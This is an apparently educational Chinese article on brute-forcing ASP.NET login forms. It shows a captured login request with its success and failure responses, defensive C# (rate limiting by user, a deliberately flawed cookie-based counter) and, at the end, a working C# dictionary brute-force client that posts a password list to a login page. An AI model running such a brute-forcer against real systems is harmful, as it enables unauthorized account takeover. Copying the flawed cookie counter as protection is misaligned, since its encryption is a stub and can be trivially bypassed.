原理
爆破是对系统的登录入口发起不间断的请求,达到暴力破解的目的。
实际案例
某系统存在爆破攻击点,只要模拟以下攻击,就能采用字典破解法,根据分析发现,只要返回状态为302的,为用户名密码正确,也就是被爆破了,状态为200的,为用户名密码错误。
在攻击的过程中,我们只要准备好字典,就能顺利实现爆破。像用户名为luminji,密码为123456这样的用户很容易就会被爆破掉。
请求:
POST /sso/ValidateUser.aspx HTTP/1.1
User-Agent: Fiddler
Accept-Language: zh-CN
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 192.168.40.193
Content-Length: 37
loginId=luminji&password=123456
以下是成功爆破的返回:
HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 151
Content-Type: text/html; charset=utf-8
Location: http://192.168.40.193/portal/pages
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=spycdd55b1cph0iohogufq55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 07 May 2012 01:25:50 GMT
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://192.168.40.193/portal/pages">here</a>.</h2>
</body></html>
以下是失败的返回:
HTTP/1.1 200 OK
Cache-Control: private
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zxomk255e3115245tpqi3k45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 07 May 2012 01:26:01 GMT
8a0
_�_
应对措施
一种思路是:定位客户端,限制客户端的请求频率。一般来说,通过两个途径可确定某个客户端,IP地址和Cookie。但是,这种方式一般来说也是被攻破的,比如使用AccessDriver这样的工具就可以更换IP地址,同时,再清空cookie就可以做到。
其次,使用验证码。这是一种非常有效的措施,但是一定程度上降低了用户体验。
Mads Kristensen提到了另一种方法是限制每个用户的登录次数,代码如下:
protected void ButtonLogin_Click(object sender, EventArgs e) { string loginName = "luminji"; if (AddAndGetLoginCount(loginName) > 5) { //block } else { if (CheckLogin(loginName) == true) { ClearLoginCount(loginName); } } } //只适用于单机,如果是集群,需要分布式缓存 int AddAndGetLoginCount(string userNanme) { if (Cache[userNanme] == null) { Cache.Insert("luminji", 1, null, System.Web.Caching.Cache.NoAbsoluteExpiration, TimeSpan.FromSeconds(10)); return 1; } else { int count = (int)Cache[userNanme] + 1; Cache[userNanme] = count; return count; } } void ClearLoginCount(string userName) { if (Cache[userName] != null) { Cache.Remove(userName); } } private bool CheckLogin(string loginName) { throw new NotImplementedException(); }
这里还有一种方法,它看上去是正确的,但是有人一眼就看出来在其貌似能正确防范爆破下的本质错误,不知道你是否能察觉。这段代码的大致思路是:
将访问次数保存在cookie中,然后根据cookie保存的值来限制访问次序。保存在cookie中的值(该值所表达的意义是:谁在某个时间段内访问了几次),需要进行加密处理,只有这样,才能保证不让客户端进行模拟。全部代码实现,请参看代码:
protected void ButtonLogin_Click(object sender, EventArgs e) { HttpCookie cookieGet = Request.Cookies.Get("btcookie"); if (cookieGet == null) { SendBFCookieToClientAndRedirect(); } else { ReceiveBFCookieAndCheckLogin(cookieGet); } } private void ReceiveBFCookieAndCheckLogin(HttpCookie cookieGet) { string loginName = "luminji"; BruteForce bf = PreAnalyCookieGet(cookieGet); if (DateTime.Parse(bf.ExpireTime) > DateTime.Now) { if (int.Parse(bf.LoginCount) > 5) { Block(); } else { GoAndCheckAndUpdateCount(cookieGet, loginName, bf); } } else { GoAndCheckAndUpdateExpiretime(cookieGet, loginName); } } private BruteForce PreAnalyCookieGet(HttpCookie cookieGet) { Response.Write(string.Format("get{0}<br/>", Session.SessionID)); Response.Write(string.Format("get Cookie:{0}<br/>", cookieGet.Value)); Response.Write(string.Format("Now:{0}", DateTime.Now)); var bfarr = cookieGet.Value.Split('|'); return new BruteForce(bfarr[0], bfarr[1], bfarr[2]); } private void GoAndCheckAndUpdateCount(HttpCookie cookieGet, string loginName, BruteForce bf) { CheckLogin(loginName); cookieGet.Value = EncryptBruteForceCookie(string.Format("{0}|{1}|{2}", int.Parse(bf.LoginCount) + 1, Session.SessionID, bf.ExpireTime)); Response.Cookies.Add(cookieGet); } private void Block() { Response.Write("block"); } private void GoAndCheckAndUpdateExpiretime(HttpCookie cookieGet, string loginName) { CheckLogin(loginName); cookieGet.Value = EncryptBruteForceCookie(string.Format("{0}|{1}|{2}", 1, Session.SessionID, DateTime.Now.AddSeconds(10))); Response.Cookies.Add(cookieGet); } private void SendBFCookieToClientAndRedirect() { Response.Write(string.Format("set{0}<br/>", Session.SessionID)); string str = EncryptBruteForceCookie(string.Format("{0}|{1}|{2}", 1, Session.SessionID, DateTime.Now.AddSeconds(10))); Session["btcookiesession"] = str; HttpCookie cookieSet = new HttpCookie("btcookie", str); cookieSet.HttpOnly = true; Response.Cookies.Add(cookieSet); //Redirect To real login page } private string EncryptBruteForceCookie(string cookie) { //encrypt cookie return cookie; } private string DecrpytBruteForceCooke(string cookie) { //encrypt cookie return cookie; } class BruteForce { public BruteForce(string loginCount, string sessionID, string expireTime) { LoginCount = loginCount; SessionID = sessionID; ExpireTime = expireTime; } public string LoginCount; public string SessionID; public string ExpireTime; }
爆破的实施
假设要爆破的登录处的逻辑如下:
protected void btnLogin_Click(object sender, EventArgs e) { if (this.txtUserName.Text == "xjm" && this.txtUserPassword.Text == "123") { //this.Session["UserName"] = this.txtUserName.Text; Response.Redirect("Home.aspx"); } else { Response.Write("login denied!"); } }
PS:一般来说,爆破就是模拟发送请求,C#代码如下:
string httpBase = @"http://localhost:50097"; List<string> keyDict = new List<string>() { "1", "12", "123", "a", "ab" }; private void button2_Click(object sender, EventArgs e) { bool isOk = false; foreach (string key in keyDict) { var request = InitRequest(); SetRequestContent(request, key); if (isOk = GetResponseAndLoginSuccess(request)) { break; } } if (isOk) { MessageBox.Show("login success."); } else { MessageBox.Show("failed!"); } } private void SetRequestContent(WebRequest request, string key) { //todo 1:should get login.aspx first, and get the viewstat // 2:then we can build this content string content = string.Format("__VIEWSTATE=%2FwEPDwULLTE1MzQ2NDY3MzVkZApspc7%2FtLNG1qzHEYJFvpuzy5P8&__EVENTVALIDATION=%2FwEWBAK7qPiwDQKl1bKzCQK9wKW7DAKC3IeGDBjXR%2FPy4G7lFRtaemefnygkRltT&txtUserName=xjm&txtUserPassword={0}&btnLogin=Button", key); request.ContentLength = content.Length; byte[] bytes = Encoding.UTF8.GetBytes(content); using (Stream requestStream = request.GetRequestStream()) { requestStream.Write(bytes, 0, bytes.Length); requestStream.Flush(); } } private bool GetResponseAndLoginSuccess(WebRequest request) { var response = request.GetResponse(); using (Stream stream = response.GetResponseStream()) using (StreamReader reader = new StreamReader(stream)) { if (response.ResponseUri.ToString().IndexOf(httpBase+ @"/Home.aspx") > -1) { var context = reader.ReadToEnd(); context += "<br/>hacked by luminji!"; webBrowser1.DocumentText = context; return true; } } return false; } private WebRequest InitRequest() { string url = httpBase + @"/login.aspx"; var request = HttpWebRequest.Create(url); request.ContentType = "application/x-www-form-urlencoded"; request.Method = "POST"; return request; }